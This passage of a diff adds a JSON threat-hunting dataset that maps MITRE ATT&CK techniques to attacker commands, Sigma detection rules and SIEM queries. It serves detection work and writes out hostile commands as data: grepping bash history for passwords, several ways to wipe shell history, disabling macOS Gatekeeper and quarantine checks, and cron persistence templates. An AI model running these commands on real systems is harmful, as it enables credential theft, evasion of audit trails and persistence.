"https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/" + ], + "author": "Florian Roth", + "date": "2018/11/23", + "tags": [ + "attack.persistence", + "attack.g0010", + "attack.t1050" + ], + "logsource": { + "product": "windows", + "service": "system" + }, + "detection": { + "selection": { + "EventID": 7045, + "ServiceName": "WerFaultSvc" + }, + "condition": "selection" + }, + "falsepositives": [ + "unlikely" + ], + "level": "critical" + }, + { + "title": "Suspicious Driver Load from Temp", + "id": "2c4523d5-d481-4ed0-8ec3-7fbf0cb41a75", + "description": "Detects a driver load from a temporary directory", + "author": "Florian Roth", + "tags": [ + "attack.persistence", + "attack.t1050" + ], + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection": { + "EventID": 6, + "ImageLoaded": "*\\Temp\\\\*" + }, + "condition": "selection" + }, + "falsepositives": [ + "there is a relevant set of false positives depending on applications in the environment" + ], + "level": "medium" + }, + { + "title": "Malicious Service Installations", + "id": "5a105d34-05fc-401e-8553-272b45c1522d", + "description": "Detects known malicious service installs that only appear in cases of lateral movement, credential dumping and other suspicious activity", + "author": "Florian Roth", + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1050", + "car.2013-09-005" + ], + "logsource": { + "product": "windows", + "service": "system" + }, + "detection": { + "selection": { + "EventID": 7045 + }, + "malsvc_wce": { + "ServiceName": [ + "WCESERVICE", + "WCE SERVICE" + ] + }, + "malsvc_paexec": { + "ServiceFileName": "*\\PAExec*" + }, + "malsvc_winexe": { + "ServiceFileName": "winexesvc.exe*" + }, + "malsvc_pwdumpx": { + "ServiceFileName": "*\\DumpSvc.exe" + }, + "malsvc_wannacry": { + "ServiceName": "mssecsvc2.0" + }, + "malsvc_persistence": { + "ServiceFileName": "* net user *" + }, + "malsvc_others": { + "ServiceName": [ + "pwdump*", + "gsecdump*", + "cachedump*" + ] + }, + "condition": "selection and 1 of malsvc_*" + }, + "falsepositives": [ + "Penetration testing" + ], + "level": "critical" + }, + { + "title": "Rare Service Installs", + "id": "66bfef30-22a5-4fcd-ad44-8d81e60922ae", + "description": "Detects rare service installs that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious services", + "status": "experimental", + "author": "Florian Roth", + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1050", + "car.2013-09-005" + ], + "logsource": { + "product": "windows", + "service": "system" + }, + "detection": { + "selection": { + "EventID": 7045 + }, + "timeframe": "7d", + "condition": "selection | count() by ServiceFileName < 5" + }, + "falsepositives": [ + "Software installation", + "Software updates" + ], + "level": "low" + }, + [ + "4657", + "Windows Registry" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4657", + "Windows Registry" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ] + ], + "external_reference": [ + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064518/Carbanak_APT_eng.pdf", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/may/emissary-panda-a-potential-new-malicious-tool/", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + "https://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.html", + "https://www.group-ib.com/blog/cobalt", + "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/", + "https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/", + "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf", + "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html" + ] + }, + { + "technique_id": "T1121", + "command_list": [ + "regsvcs.exe *.dll", + "regasm.exe *.dll", + "rundll32.exe *.dll.entrypoint" + ], + "commands": [ + { + "command": "regsvcs.exe *.dll", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "regasm.exe *.dll", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "rundll32.exe *.dll.entrypoint", + "source": "Threat Hunting Tables", + "name": "" + } + ], + "parsed_datasets": [ + { + "chain_id": "100168", + "os": "windows", + "parent_process": "regsvcs.exe", + "commandline_string": "*.dll", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "execution", + "mitre_attack": "T1121", + "itw_sample": "" + }, + { + "chain_id": "100169", + "os": "windows", + "parent_process": "regasm.exe", + "commandline_string": "*.dll", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "execution", + "mitre_attack": "T1121", + "itw_sample": "" + }, + { + "chain_id": "100170", + "os": "windows", + "parent_process": "rundll32.exe", + "commandline_string": "*.dll.entrypoint", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "execution", + "mitre_attack": "T1121", + "itw_sample": "" + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 3and (process_path contains \"regsvcs.exe\"or process_path contains \"regasm.exe\")", + "name": "Regsvcs Regasm" + } + ], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "ID 1 & 7", + "Sysmon" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ] + ], + "external_reference": [] + }, + { + "technique_id": "T1028", + "command_list": [ + "powershell Enable-PSRemoting -Force", + "winrm.exe" + ], + "commands": [ + { + "command": "powershell Enable-PSRemoting -Force", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "winrm.exe", + "source": "SysmonHunter - Windows Remote Management", + "name": "" + } + ], + "parsed_datasets": [ + { + "chain_id": "100174", + "os": "windows", + "parent_process": "powershell", + "commandline_string": "Enable-PSRemoting -Force", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "remote_execution", + "mitre_attack": "T1028", + "itw_sample": "" + }, + { + "name": "Windows Remote Management", + "description": null, + "level": "medium", + "phase": "Execution, Lateral Movement", + "query": [ + { + "type": "process", + "process": { + "any": { + "pattern": "winrm.exe" + } + } + } + ] + }, + { + "Rules": "ET Open", + "SID": "2026849", + "Signature": "ET POLICY WinRM wsman Access - Possible Lateral Movement", + "Verified": "Yes" + }, + { + "Rules": "ET Open", + "SID": "2026850", + "Signature": "ET USER_AGENTS WinRM User Agent Detected - Possible Lateral Movement", + "Verified": "Yes" + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and (process_path contains \"wsmprovhost.exe\"or process_path contains \"winrm.cmd\")and (process_command_line contains \"Enable-PSRemoting -Force\"or process_command_line contains \"Invoke-Command -computer_name\"or process_command_line contains \"wmic*node*process call create\")", + "name": "Windows Remote Management" + }, + { + "product": "Suricata (NSM)", + "query": "ET POLICY WinRM wsman Access - Possible Lateral Movement", + "name": "ET Open Rule" + }, + { + "product": "Suricata (NSM)", + "query": "ET USER_AGENTS WinRM User Agent Detected - Possible Lateral Movement", + "name": "ET Open Rule" + } + ], + "possible_detections": [ + { + "title": "Mimikatz through Windows Remote Management", + "id": "aa35a627-33fb-4d04-a165-d33b4afca3e8", + "description": "Detects usage of mimikatz through WinRM protocol by monitoring access to lsass process by wsmprovhost.exe.", + "references": [ + "https://pentestlab.blog/2018/05/15/lateral-movement-winrm/" + ], + "status": "stable", + "author": "Patryk Prauze - ING Tech", + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection": { + "EventID": 10, + "TargetImage": "C:\\windows\\system32\\lsass.exe", + "SourceImage": "C:\\Windows\\system32\\wsmprovhost.exe" + }, + "condition": "selection" + }, + "tags": [ + "attack.credential_access", + "attack.execution", + "attack.t1003", + "attack.t1028", + "attack.s0005" + ], + "falsepositives": [ + "low" + ], + "level": "high" + }, + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "5140/5145", + "Net Shares" + ], + [ + "4663", + "File monitoring" + ], + [ + "4624", + "Authentication logs" + ], + [ + "Netflow/Enclave netflow" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "5140/5145", + "Net Shares" + ], + [ + "4663", + "File monitoring" + ], + [ + "4624", + "Authentication logs" + ], + [ + "Netflow/Enclave netflow" + ] + ], + "external_reference": [ + "https://www.secureworks.com/research/bronze-union" + ] + }, + { + "technique_id": "T1138", + "command_list": [ + "*.exe reg add", + "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Custom", + "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB", + "sdbinst.exe\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Custom|\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB", + "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Custom|\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB" + ], + "commands": [ + { + "command": "*.exe reg add", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Custom", + "source": "Threat Hunting Tables", + "name": "registry_path" + }, + { + "command": "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB", + "source": "Threat Hunting Tables", + "name": "registry_path" + }, + { + "command": "sdbinst.exe\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Custom|\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB", + "source": "SysmonHunter - Application Shimming", + "name": "" + }, + { + "command": "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Custom|\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB", + "source": "SysmonHunter - Application Shimming", + "name": "" + } + ], + "parsed_datasets": [ + { + "chain_id": "100182", + "os": "windows", + "parent_process": "*.exe", + "commandline_string": "reg add", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Custom", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "application_shimming", + "mitre_attack": "T1138", + "itw_sample": "" + }, + { + "chain_id": "100183", + "os": "windows", + "parent_process": "*.exe", + "commandline_string": "reg add", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "application_shimming", + "mitre_attack": "T1138", + "itw_sample": "" + }, + { + "name": "Application Shimming", + "description": null, + "level": "medium", + "phase": "Persistence", + "query": [ + { + "type": "process", + "process": { + "image": { + "pattern": "sdbinst.exe" + }, + "cmdline": { + "pattern": "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Custom|\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB" + } + } + }, + { + "type": "reg", + "reg": { + "path": { + "pattern": "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Custom|\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB" + } + } + } + ] + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 11and file_name contains \"C:\\\\Windows\\\\AppPatch\\\\Custom\\\\\"", + "name": "Application Shimming FileAccess" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1and process_path contains \"sdbinst.exe\"", + "name": "Application Shimming Process" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where (EventID == 12 or EventID == 13 or EventID == 14)and registry_key_path contains \"\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\InstalledSDB\\\\\"", + "name": "Application Shimming Registry" + } + ], + "possible_detections": [ + { + "title": "Possible Shim Database Persistence via sdbinst.exe", + "id": "517490a7-115a-48c6-8862-1a481504d5a8", + "status": "experimental", + "description": "Detects installation of a new shim using sdbinst.exe. A shim can be used to load malicious DLLs into applications.", + "references": [ + "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html" + ], + "tags": [ + "attack.persistence", + "attack.t1138" + ], + "author": "Markus Neis", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image": [ + "*\\sdbinst.exe" + ], + "CommandLine": [ + "*.sdb*" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4657", + "Windows Registry" + ], + [ + "Loaded DLLs" + ], + [ + "System calls" + ], + [ + "Sysmon ID 7", + "Loaded DLLs" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4657", + "Windows Registry" + ], + [ + "System calls" + ] + ], + "external_reference": [ + "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html" + ] + }, + { + "technique_id": "T1139", + "command_list": [ + "bash cat ~/.bash_history | grep -e '-p ' -e 'pass' -e 'ssh' > loot.txt", + "bash cat ~/.bash_history | grep -e '-p ' -e 'pass' -e 'ssh' > out.txt", + "python/collection/linux/pillage_user", + "python/collection/osx/pillage_user", + "cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file}", + "cat .bash_history | grep password > bash.txt" + ], + "commands": [ + { + "command": "bash cat ~/.bash_history | grep -e '-p ' -e 'pass' -e 'ssh' > loot.txt", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "bash cat ~/.bash_history | grep -e '-p ' -e 'pass' -e 'ssh' > out.txt", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "python/collection/linux/pillage_user", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/collection/osx/pillage_user", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file}", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "cat .bash_history | grep password > bash.txt", + "source": "Kirtar22/Litmus_Test", + "name": "" + } + ], + "parsed_datasets": [ + { + "chain_id": "100190", + "os": "mac", + "parent_process": "bash", + "commandline_string": "cat ~/.bash_history | grep -e '-p ' -e 'pass' -e 'ssh' > loot.txt", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "bash_history", + "mitre_attack": "T1139", + "itw_sample": "" + }, + { + "chain_id": "100201", + "os": "linux", + "parent_process": "bash", + "commandline_string": "cat ~/.bash_history | grep -e '-p ' -e 'pass' -e 'ssh' > out.txt", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "bash_history", + "mitre_attack": "T1139", + "itw_sample": "" + }, + { + "Empire Module": "python/collection/linux/pillage_user", + "ATT&CK Technique #1": "T1139", + "ATT&CK Technique #2": "T1212", + "Technique": "Bash History", + "Concatenate for Python Dictionary": "\"python/collection/linux/pillage_user\": [\"T1139\",\"T1212\"]," + }, + { + "Empire Module": "python/collection/osx/pillage_user", + "ATT&CK Technique #1": "T1139", + "ATT&CK Technique #2": "T1033", + "Technique": "Bash History", + "Concatenate for Python Dictionary": "\"python/collection/osx/pillage_user\": [\"T1139\",\"T1033\"]," + } + ], + "queries": [ + { + "product": "Splunk", + "query": "index=linux sourcetype=\"linux_audit\" syscall=257 key=bash_history_changes | table host,auid,syscall,syscall_name,exe", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=bash_history cat bash_history | table _time,host,user_name,bash_command", + "name": "" + } + ], + "possible_detections": [ + "auditlogs (audit.rules)", + "bash_history logs" + ], + "external_reference": [] + }, + { + "technique_id": "T1146", + "command_list": [ + "bash unset HISTFILE", + "bash export HISTFILESIZE=0", + "bash history -c", + "bash rm ~/.bash_history", + "bash cat /dev/null > ~/.bash_history", + "```", + "rm ~/.bash_history", + "echo \" \" > .bash_history", + "cat /dev/null > ~/.bash_history", + "ln -sf /dev/null ~/.bash_history", + "truncate -s0 ~/.bash_history", + "unset HISTFILE", + "export HISTFILESIZE=0", + "history -c" + ], + "commands": [ + { + "command": "bash unset HISTFILE", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "bash export HISTFILESIZE=0", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "bash history -c", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "bash rm ~/.bash_history", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "bash cat /dev/null > ~/.bash_history", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "```", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "rm ~/.bash_history", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "echo \" \" > .bash_history", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "cat /dev/null > ~/.bash_history", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "ln -sf /dev/null ~/.bash_history", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "truncate -s0 ~/.bash_history", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "unset HISTFILE", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "export HISTFILESIZE=0", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "history -c", + "source": "Kirtar22/Litmus_Test", + "name": "" + } + ], + "parsed_datasets": [ + { + "chain_id": "100191", + "os": "mac", + "parent_process": "bash", + "commandline_string": "unset HISTFILE", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "defense_evasion", + "mitre_attack": "T1146", + "itw_sample": "" + }, + { + "chain_id": "100192", + "os": "mac", + "parent_process": "bash", + "commandline_string": "export HISTFILESIZE=0", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "defense_evasion", + "mitre_attack": "T1146", + "itw_sample": "" + }, + { + "chain_id": "100193", + "os": "mac", + "parent_process": "bash", + "commandline_string": "history -c", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "defense_evasion", + "mitre_attack": "T1146", + "itw_sample": "" + }, + { + "chain_id": "100194", + "os": "mac", + "parent_process": "bash", + "commandline_string": "rm ~/.bash_history", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "defense_evasion", + "mitre_attack": "T1146", + "itw_sample": "" + }, + { + "chain_id": "100195", + "os": "mac", + "parent_process": "bash", + "commandline_string": "cat /dev/null > ~/.bash_history", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "defense_evasion", + "mitre_attack": "T1146", + "itw_sample": "" + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1and (process_command_line contains \"*rm (Get-PSReadlineOption).HistorySavePath*\"or process_command_line contains \"*del (Get-PSReadlineOption).HistorySavePath*\"or process_command_line contains \"*Set-PSReadlineOption \u2013HistorySaveStyle SaveNothing*\"or process_command_line contains \"*Remove-Item (Get-PSReadlineOption).HistorySavePath*\")", + "name": "Clear Command History" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=linux_audit syscall=263 | table time,host,auid,uid,euid,exe,key", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=linux_audit type=PATH name=.bash_history nametype=delete | table time,name,nametype", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=\"linux_audit\" bash_history_changes exe!=/home/ec2-user/splunk/bin/splunkd syscall=257 a2!=0 AND a3!=0 | table host,syscall,syscall_name,exe,auid", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "a2!=0 and a3!=0 are added in to the query to distinuish echo and cat - both logs Systemcall 257 (openat). Morover, when a user logsin through ssh - SYSCALL 257 is used with exe=/usr/bin/bash (2 events generated)for /home/$USER/.bash_history; however in that case the command arguments a2=0 and a3=0 ; when we use command \"echo \" \"> .bash_history\" the same systemcall (257) and the same exe = /usr/bin/bash is used however command arguments a2!=0 and a3!=0.", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=\"linux_audit\" bash_history_changes exe!=/home/ec2-user/splunk/bin/splunkd syscall=257 exe=/usr/bin/bash a2!=0 AND a3!=0| table host,syscall,syscall_name,exe,auid", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "-a always,exit -F arch=b64 -F PATH=/home/ec2-user/.bash_history -S unlinkat -F auid>=1000 -F auid!=4294967295 -F key=delete_bash_history", + "name": "" + }, + { + "product": "Splunk", + "query": "-w /home/ec2-user/.bash_history -p rwa -k bash_history_changes", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=\"bash_history\" \"rm * .bash_history\"", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + } + ], + "possible_detections": [ + "auditlogs (audit.rules)", + "bash_history logs", + { + "title": "Clear Command History", + "id": "fdc88d25-96fb-4b7c-9633-c0e417fdbd4e", + "status": "experimental", + "description": "Clear command history in linux which is used for defense evasion.", + "references": [ + "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1146/T1146.yaml", + "https://attack.mitre.org/techniques/T1146/", + "https://www.hackers-arise.com/single-post/2016/06/20/Covering-your-BASH-Shell-Tracks-AntiForensics" + ], + "author": "Patrick Bareiss", + "date": "2019/03/24", + "logsource": { + "product": "linux" + }, + "detection": { + "keywords": [ + "rm *bash_history", + "echo \"\" > *bash_history", + "cat /dev/null > *bash_history", + "ln -sf /dev/null *bash_history", + "truncate -s0 *bash_history", + "export HISTFILESIZE=0", + "history -c", + "history -w", + "shred *bash_history" + ], + "condition": "keywords" + }, + "falsepositives": [ + "Unknown" + ], + "level": "high", + "tags": [ + "attack.defense_evasion", + "attack.t1146" + ] + } + ], + "external_reference": [] + }, + { + "technique_id": "T1147", + "command_list": [ + "bash sudo xattr -r -d com.apple.quarantine /path/to/*.app" + ], + "commands": [ + { + "command": "bash sudo xattr -r -d com.apple.quarantine /path/to/*.app", + "source": "Threat Hunting Tables", + "name": "" + } + ], + "parsed_datasets": [ + { + "chain_id": "100196", + "os": "mac", + "parent_process": "bash", + "commandline_string": "sudo xattr -r -d com.apple.quarantine /path/to/*.app", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "defense_evasion", + "mitre_attack": "T1147", + "itw_sample": "" + } + ], + "queries": [], + "possible_detections": [], + "external_reference": [] + }, + { + "technique_id": "T1148", + "command_list": [ + "bash sudo spctl --master-disable", + "```", + "export HISTCONTROL=ignoreboth" + ], + "commands": [ + { + "command": "bash sudo spctl --master-disable", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "```", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "export HISTCONTROL=ignoreboth", + "source": "Kirtar22/Litmus_Test", + "name": "" + } + ], + "parsed_datasets": [ + { + "chain_id": "100197", + "os": "mac", + "parent_process": "bash", + "commandline_string": "sudo spctl --master-disable", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "defense_evasion", + "mitre_attack": "T1148", + "itw_sample": "" + } + ], + "queries": [ + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=\"bash_history\" export HISTCONTROL | table host, user_name, bash_command", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + } + ], + "possible_detections": [ + "bash_history logs" + ], + "external_reference": [] + }, + { + "technique_id": "T1155", + "command_list": [ + "osascript do shell script echo \\\"import ", + "osascript -e 'tell app \"System Preferences\" to activate'", + "python/persistence/osx/mail" + ], + "commands": [ + { + "command": "osascript do shell script echo \\\"import ", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "osascript -e 'tell app \"System Preferences\" to activate'", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "python/persistence/osx/mail", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "chain_id": "100198", + "os": "mac", + "parent_process": "osascript", + "commandline_string": "do shell script echo \\\"import ", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "applescript", + "mitre_attack": "T1155", + "itw_sample": "" + }, + { + "chain_id": "100199", + "os": "mac", + "parent_process": "osascript", + "commandline_string": "-e 'tell app \"System Preferences\" to activate'", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "applescript", + "mitre_attack": "T1155", + "itw_sample": "" + }, + { + "Empire Module": "python/persistence/osx/mail", + "ATT&CK Technique #1": "T1155", + "ATT&CK Technique #2": "T1108", + "Technique": "AppleScript", + "Concatenate for Python Dictionary": "\"python/persistence/osx/mail\": [\"T1155\",\"T1108\"]," + } + ], + "queries": [], + "possible_detections": [], + "external_reference": [] + }, + { + "technique_id": "T1168", + "command_list": [ + "bash crontab", + "shell crontab", + "python/persistence/multi/crontab", + "echo \"* * * * * #{command}\" > #{tmp_cron} && crontab #{tmp_cron}", + "echo \"#{command}\" > /etc/cron.daily/#{cron_script_name}", + "at now + 1 minute -f script.sh", + "echo \"shutdown -h now\" | at -m 23:5", + "at now + 1 minute | ping -c 4 google.com > /home/ec2-user/google6.txt" + ], + "commands": [ + { + "command": "bash crontab", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "shell crontab", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "python/persistence/multi/crontab", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "echo \"* * * * * #{command}\" > #{tmp_cron} && crontab #{tmp_cron}", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "echo \"#{command}\" > /etc/cron.daily/#{cron_script_name}", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "at now + 1 minute -f script.sh", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "echo \"shutdown -h now\" | at -m 23:5", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "at now + 1 minute | ping -c 4 google.com > /home/ec2-user/google6.txt", + "source": "Kirtar22/Litmus_Test", + "name": "" + } + ], + "parsed_datasets": [ + { + "chain_id": "100200", + "os": "mac", + "parent_process": "bash", + "commandline_string": "crontab", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "cron_job", + "mitre_attack": "T1168", + "itw_sample": "" + }, + { + "chain_id": "100202", + "os": "linux", + "parent_process": "shell", + "commandline_string": "crontab", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "cron_job", + "mitre_attack": "T1168", + "itw_sample": "" + }, + { + "Empire Module": "python/persistence/multi/crontab", + "ATT&CK Technique #1": 